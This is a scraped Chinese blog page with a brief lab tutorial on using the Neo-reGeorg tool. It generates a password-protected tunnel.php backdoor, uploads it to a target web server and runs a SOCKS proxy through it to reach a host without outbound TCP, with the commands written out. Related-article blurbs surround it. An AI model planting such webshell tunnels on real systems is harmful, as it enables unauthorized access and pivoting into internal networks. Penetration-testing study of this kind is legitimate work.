针对tcp不出网打——HTTP封装隧道代理（以CFS演示）

古希腊掌管猴子的神

已于 2024-07-25 21:15:35 修改

阅读量513

点赞数 10

文章标签： tcp/ip http 网络协议安全 linux 网络安全网络

于 2024-07-07 15:34:46 首次发布

本文链接：https://blog.csdn.net/weixin_74171325/article/details/140246235

版权

上传工具到攻击机

使用说明

生成后门文件

由于电脑短路无法拖动文件，我就wget发送到目标主机tunnel.php文件

后台私信获取弹药库工具reGeorg

上传工具到攻击机

使用说明

生成后门文件

python3 neoreg.py generate -k crazy #-k crazy 设置密码为crazy

成功上传

可以访问上传的文件

启动代理监听

python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy 
python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000  #-l 0.0.0.0设置监听地址 -p 20000设置监听端口    注意：不要忘记proxychains的修改

可以看到初始是监听127.0.0.1:1080，我们选择改监听地址和端口带出到我们物理机

python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000

成功带出

配置kali代理,kali也可以正常请求到

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

古希腊掌管猴子的神

关注关注

10
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Putty建立SSH隧道代理上网

悦分享

06-02

2883

代理服务器（Proxy Server）的工作原理是：当客户在浏览器中设置好Proxy Server后，你使用浏览器访问所有WWW站点的请求都不会直接发给目的主机，而是先发给代理服务器，代理服务器接受了客户的请求以后，由代理服务器向目的主机发出请求，并接受目的主机的数据，存于代理服务器的硬盘中，然后再由代理服务器将客户要求的数据发给客户。由于一般代理服务器拥有较大的带宽，较高的性能，并且能够智能地缓存已浏览或未浏览的网站内容，因此，在一定情况下，客户端通过代理服务器能更快速地访问网络资源。

隧道技术之不出网-正向代理

G3et的博客

02-16

780

很多情况下，拿下一台主机不出网，就没办法反向连接，需要去正向连接，这里用到一个工具正向代理工具Neo-reGeorg。

1 条评论您还未登录，请先登录后发表或查看评论

自己要怎么做一个隧道代理？隧道代理搭建教程

njmanong的博客

01-07

1593

众所周知，隧道代理比动态短效代理贵，但是因为其产品特性，确实也更好用更方便，那我们要如何自己搭建起来隧道代理呢？说来也不复杂，按照我说的方法，即可搭建起来隧道代理。

[1202]docker搭建隧道代理池

周小董

06-08

2223

隧道代理是基于高性能主机构建的动态IP代理服务器；以设置固定代理，每次请求自动更换到不同IP (这里规则可以自己定)；线路以高匿名、高便捷、多并发的优势，适用于个人/企业对代理稳定性和品质要求高的客户（主要看你代理池中的 IP 稳不稳定）。

http-proxy-tunnel:通过HTTP代理创建嵌套隧道-开源

04-25

Http-proxy-tunnel通过允许CONNECT方法的http代理创建TCP隧道。它与其他代理隧道程序的不同之处在于，它可以通过多个代理建立隧道，并且可以使用SSL隧道。这些功能意味着，与可以代理的Web服务器（例如Apache）结合使用，您可以从端口80和443提供正常的网页服务，并同时通过这些端口连接到服务器（使用ssh说）。所有可用的文档都可以在http://http-proxy-tunnel.sourceforge.net/上在线阅读。

内网渗透—代理Socks协议、路由不出网、SMB绕过、CS-MSF控制上线

剁椒鱼头没剁椒的博客

05-26

1702

本篇和上篇文章前置的知识基本差不多，这里我就不在赘述了，感兴趣的可以去上CSDN上或者公众号找上篇内容，那篇中涉及到了很多的前置知识，本篇主要以实操为主。攻击机的目标是Windows7系统，而攻击机是无法直接连接Windows7，如果这里不了解我说的是什么意思，请去学习一下路由原理吧！自然而然下面也就不用解释了，肯定是能够连接能够连接能够连接到Windows7。目前攻击机只能够连接，但是我们可以通过采用一些技术而实现和Windows7通信，这技术也就是本章需要介绍的。这里我们不考虑是通过如何手段获取到。

CFS.zip_CFS-GA_cfs

09-21

**CFS加密算法详解** CFS（Chaffing and Winnowing）是一种基于混沌理论的文件加密算法，由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”（添加混淆数据）和“Winnowing”...

cFS-demo:cFS应用程序的演示；卫星的“ hello world”（如果您愿意）

04-04

WEST-cFS演示该飞行软件（FSW）旨在作为cFS的概念证明，因为它与WEST有关。该演示将使用cFS中的功能来测试其功能并通过该框架使成员成名。要求该应用程序内置于Docker中，以确保所有依赖项均被锁定。这将需要和...

操作系统之CFS进程调度算法：参数调整优化与应用场景

最新发布

10-18

内容概要：本文详细介绍了一个Linux操作系统中的重要组件——完全公平调度器（CFS）的工作原理及参数调整方法。CFS旨在提供公平、响应性和可预测性的CPU时间分配机制。文中首先介绍了CFS的基本概念，包括虚拟运行...

cfs:用于构建云的网络文件系统界面

04-30

cfs（云文件系统）是用于构建云的低级文件系统接口。 cfs不是分布式文件系统。它被设计为所有计算机上可用的最低云基础架构构建块。 cfs的设计目标是可靠性，简单性和可用性。地位当前状态为Alpha前去做：基本...

http-tunnel(隧道)

01-22

QQ上网代理，能够在突破端口限制！！！！！！！！！！！！！！！！！

内网安全——域横向内网漫游Socks代理隧道技术

世间繁华梦一出

08-06

593

内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是（如下图）在两个不同内网的主机之间的外网提供一台服务器，内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...

您可知道如何通过`HTTP2`实现TCP的内网穿透？？？

xiaohucxy的博客

04-30

229

可能有人很疑惑应用层转发传输层？，为什么会有这样的需求啊？？？哈哈技术无所不用其极，由于一些场景下，对于一个服务器存在某一个内部网站中，但是对于这个服务器它没有访问外网的权限，虽然也可以申请端口访问外部指定的ip+端口，但是对于访问服务内部的TCP的时候我们就会发现忘记申请了！这个时候我们又要提交申请，又要等审批，然后开通端口，对于这个步骤不是一般的麻烦，所以我在想是否可以直接利用现有的Http网关的端口进行转发内部的TCP服务？这个时候我询问了我们的老九。

如何快速在服务器上搭建隧道ip

w2786886635的博客

03-16

6991

首先申明我也是看了别人的文章，然后第一次搞这个，本文章写的可能会比较细节，适合没搭建过的铁子。我看的是这篇帖子，我会在他这个帖子上进行一些基础上的教程。建议可以先去看一下。 5分钟，自己做一个隧道代理-云社区-华为云隧道代理不需要自己更换 IP，使用起来非常方便。但是隧道 IP 的价格远远高于普通代理。本文介绍一种基于普通代理自己搭建隧道代理的方法，能大大节约开发费用。https://bbs.huaweicloud.com/blogs/286309首先无论是在服务器上还是windows上搭建隧道i..

浏览器使用隧道代理HTTP：洞悉无界信息

weixin_73725158的博客

01-02

939

隧道代理HTTP是一种网络通信方式，通过建立一条虚拟的通信隧道，用户可以绕过本地的网络限制，直接连接到外部的服务器，再由外部服务器连接到目标网站。这时，隧道代理HTTP便成为了一个重要的工具，帮助用户突破限制，洞悉无界信息。注意隐私保护：在使用隧道代理HTTP时，用户的网络活动将被代理服务器记录。总之，隧道代理HTTP是一种实用的工具，获取更多的信息。选择可靠的代理服务器：使用隧道代理HTTP时，应选择可靠的代理服务器，以确保网络通信的安全性和稳定性。在设置页面中，找到网络设置或代理设置选项。

内网安全：隧道技术详解

2201_75362610的博客

01-24

951

SMB（Server Message Block）协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发，用于在局域网中的计算机之间共享文件和资源，445端口运行打印机共享：SMB协议支持打印机的共享，允许用户在网络中使用共享打印机进行打印操作。通过SMB协议，用户可以连接到其他计算机上的共享打印机，并发送打印任务进行打印。文件共享：SMB协议允许计算机之间共享文件和目录。通过SMB协议，用户可以在网络中访问其他计算机上的共享文件夹，并进行文件的读取、写入和管理操作。

内网渗透—Socks代理协议&主机不出网&CS-MSF控制上线

2301_76227305的博客

05-22

1828

那么什么是代理呢，我们本地可以直接访问windows server2008，无法直接访问win7。但是windows server2008可以直接访问win7，因为他们有同一网段的ip嘛。那么我们可以拿到windows server2008控制权，然后让它转发我们本地的流量到win7，那么server2008就充当了我们访问win7的代理。例如，有个包裹要从广州到深圳，但是包裹自己到达不了目的地，那么我们可以让快递公司代替我们把包裹送到深圳，此时快递公司就充当我们的代理。

深入了解隧道代理HTTP的协议与技术细节

weixin_73725158的博客

01-02

809

在隧道代理HTTP中，客户端首先通过HTTP协议与代理服务器建立连接，然后将请求数据封装在HTTP请求中发送给代理服务器。此时，隧道代理HTTP需要承担协议转换的任务，将客户端的请求转换为目标服务器能理解的格式，并将目标服务器的响应转换回客户端能理解的格式。隧道代理HTTP，作为一种网络通信的桥梁技术，其背后的协议与技术细节承载着网络世界的无尽奥秘。：当有多个代理服务器可用时，隧道代理HTTP可以通过负载均衡技术将请求分发给不同的代理服务器处理，以提高整体的处理能力和容错性。

记一次失败的regeorg+proxifiler代理实验--解决内网主机不出网问题

Armandhe的博客

07-03

3225

虽然这个工具很有意思，但我没有成功使用它就是垃圾

Linux4.15内核CFS调度器解析

"Linux CFS 调度器详解——基于Linux 4.15内核" 在Linux操作系统中，调度器扮演着至关重要的角色，它负责决定哪个进程应该获得CPU执行时间。这篇文档主要聚焦于Linux 4.15内核版本中的 Completely Fair Scheduler ...